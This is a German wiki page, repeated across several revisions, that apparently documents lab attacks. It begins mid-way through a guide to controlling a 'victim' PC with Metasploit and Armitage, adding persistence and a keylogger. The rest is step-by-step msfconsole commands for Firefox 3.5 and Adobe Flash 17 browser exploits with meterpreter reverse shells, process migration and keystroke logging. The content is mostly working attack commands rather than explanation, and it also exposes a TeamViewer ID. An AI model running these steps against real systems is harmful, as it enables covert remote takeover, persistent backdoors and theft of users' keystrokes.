ifconfig
netstat -lntp
service apache2 restart

[[Datei:8 opfer.png]]

auf der opfer Seite

[[Datei:12 schadeware.png]]

=Kontrolle übernehmen=

nun starten wir erst metasploit und danach armitage (linke leiste)

[[Datei:mframe.png]]

Standard Einstellung beibehalten weitere Meldungen einfach bestätigen

[[Datei:amriamstarten.png]]

[[Datei:1armitagestarten.png]]

wenn armitage gestartet ist erstellen wir einen Server zum lauschen
*payload
**windows
***metapreter

hier passen wir den LPORT an

und warten darauf das sich unser opfer verbindet

nun erscheint oben rechts der opfer Computer

(durch links klick auswählen)

=Dauerhaft infizieren=

als nächstes wollen wir den Trojaner dauerhaft speichern

wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an

[[Datei:200persist.png]]

wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden

diese kann ein par Minuten dauern

=Was kann man machen=
jetzt gibt es viele Möglichkeiten
*Rechtsklick infizierter pc
**meterpreter
***explore
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw

=kurz Beispiel keylogger=

[[metasploit & armitage keylogger]]

Metasploit browser Exlpoit

2019-09-02T09:58:47Z

Joshua.schreiner: /* vorgehnsweise */

=Setup Opfer=
Winxp Service pack 3
Firefox 3.5

=Setup Hacker=
Kali Linux
ip: 192.168.242.53

=Action=
starte metasploit
msfconsole

use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit

jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert

session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

=Win7 32bit Exploit=
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html

* Setup Opfer

win732 bit

adobeflash 17.0.0.134

firefox

TeamViewer ID 597 708 786

==Hackersystem==
kali linux

ip 192.168.244.50

===on the console===
metasploit konsole starten
*msfconsole
auswahl des exploits
*use exploit/windows/browser/adobe_flash_domain_memory_uaf
auswahl der schadsoftware
*set payload windows/meterpreter/reverse_tcp
setzen des localhost
*set lhost 192.168.244.50
setzen des webservers
*set srvhost 192.168.244.50
pfad zum hack
*set uripath /hack
ausführen des exploits
*exploit

=on the target=
*gehen mit win7 auf http://192.168.244.150:8080/hack

=on the hackersystem=
==commandos==
sessions -l (listet die sessions)
sessions -i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

==method==
session betreten
*msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
ps listing
*meterpreter > ps

Metasploit browser Exlpoit

2019-09-02T09:57:51Z

Joshua.schreiner: /* auf dem hackersystem */

=Setup Opfer=
Winxp Service pack 3
Firefox 3.5

=Setup Hacker=
Kali Linux
ip: 192.168.242.53

=Action=
starte metasploit
msfconsole

use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit

jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert

session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

=Win7 32bit Exploit=
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html

* Setup Opfer

win732 bit

adobeflash 17.0.0.134

firefox

TeamViewer ID 597 708 786

==Hackersystem==
kali linux

ip 192.168.244.50

===on the console===
metasploit konsole starten
*msfconsole
auswahl des exploits
*use exploit/windows/browser/adobe_flash_domain_memory_uaf
auswahl der schadsoftware
*set payload windows/meterpreter/reverse_tcp
setzen des localhost
*set lhost 192.168.244.50
setzen des webservers
*set srvhost 192.168.244.50
pfad zum hack
*set uripath /hack
ausführen des exploits
*exploit

=on the target=
*gehen mit win7 auf http://192.168.244.150:8080/hack

=on the hackersystem=
==commandos==
sessions -l (listet die sessions)
sessions -i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

==vorgehnsweise==
session betreten
*msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
ps listing
*meterpreter > ps

Metasploit browser Exlpoit

2019-09-02T09:57:27Z

Joshua.schreiner: /* auf dem opfer */

=Setup Opfer=
Winxp Service pack 3
Firefox 3.5

=Setup Hacker=
Kali Linux
ip: 192.168.242.53

=Action=
starte metasploit
msfconsole

use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit

jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert

session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

=Win7 32bit Exploit=
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html

* Setup Opfer

win732 bit

adobeflash 17.0.0.134

firefox

TeamViewer ID 597 708 786

==Hackersystem==
kali linux

ip 192.168.244.50

===on the console===
metasploit konsole starten
*msfconsole
auswahl des exploits
*use exploit/windows/browser/adobe_flash_domain_memory_uaf
auswahl der schadsoftware
*set payload windows/meterpreter/reverse_tcp
setzen des localhost
*set lhost 192.168.244.50
setzen des webservers
*set srvhost 192.168.244.50
pfad zum hack
*set uripath /hack
ausführen des exploits
*exploit

=on the target=
*gehen mit win7 auf http://192.168.244.150:8080/hack

=auf dem hackersystem=
==commandos==
sessions -l (listet die sessions)
sessions -i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

==vorgehnsweise==
session betreten
*msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
ps listing
*meterpreter > ps

Metasploit browser Exlpoit

2019-09-02T09:56:06Z

Joshua.schreiner: /* auf der konsole */

=Setup Opfer=
Winxp Service pack 3
Firefox 3.5

=Setup Hacker=
Kali Linux
ip: 192.168.242.53

=Action=
starte metasploit
msfconsole

use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit

jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert

session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

=Win7 32bit Exploit=
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html

* Setup Opfer

win732 bit

adobeflash 17.0.0.134

firefox

TeamViewer ID 597 708 786

==Hackersystem==
kali linux

ip 192.168.244.50

===on the console===
metasploit konsole starten
*msfconsole
auswahl des exploits
*use exploit/windows/browser/adobe_flash_domain_memory_uaf
auswahl der schadsoftware
*set payload windows/meterpreter/reverse_tcp
setzen des localhost
*set lhost 192.168.244.50
setzen des webservers
*set srvhost 192.168.244.50
pfad zum hack
*set uripath /hack
ausführen des exploits
*exploit

=auf dem opfer=
*gehen mit win7 auf http://192.168.244.150:8080/hack
=auf dem hackersystem=
==commandos==
sessions -l (listet die sessions)
sessions -i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

==vorgehnsweise==
session betreten
*msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
ps listing
*meterpreter > ps

Metasploit browser Exlpoit

2019-09-02T09:54:56Z

Joshua.schreiner: /* vorgehen */

=Setup Opfer=
Winxp Service pack 3
Firefox 3.5

=Setup Hacker=
Kali Linux
ip: 192.168.242.53

=Action=
starte metasploit
msfconsole

use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit

jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert

session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

=Win7 32bit Exploit=
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html

* Setup Opfer

win732 bit

adobeflash 17.0.0.134

firefox

TeamViewer ID 597 708 786

==Hackersystem==
kali linux

ip 192.168.244.50

===auf der konsole===
metasploit konsole starten
*msfconsole
auswahl des exploits
*use exploit/windows/browser/adobe_flash_domain_memory_uaf
auswahl der schadsoftware
*set payload windows/meterpreter/reverse_tcp
setzen des localhost
*set lhost 192.168.244.50
setzen des webservers
*set srvhost 192.168.244.50
pfad zum hack
*set uripath /hack
ausführen des exploits
*exploit

=auf dem opfer=
*gehen mit win7 auf http://192.168.244.150:8080/hack
=auf dem hackersystem=
==commandos==
sessions -l (listet die sessions)
sessions -i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

==vorgehnsweise==
session betreten
*msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
ps listing
*meterpreter > ps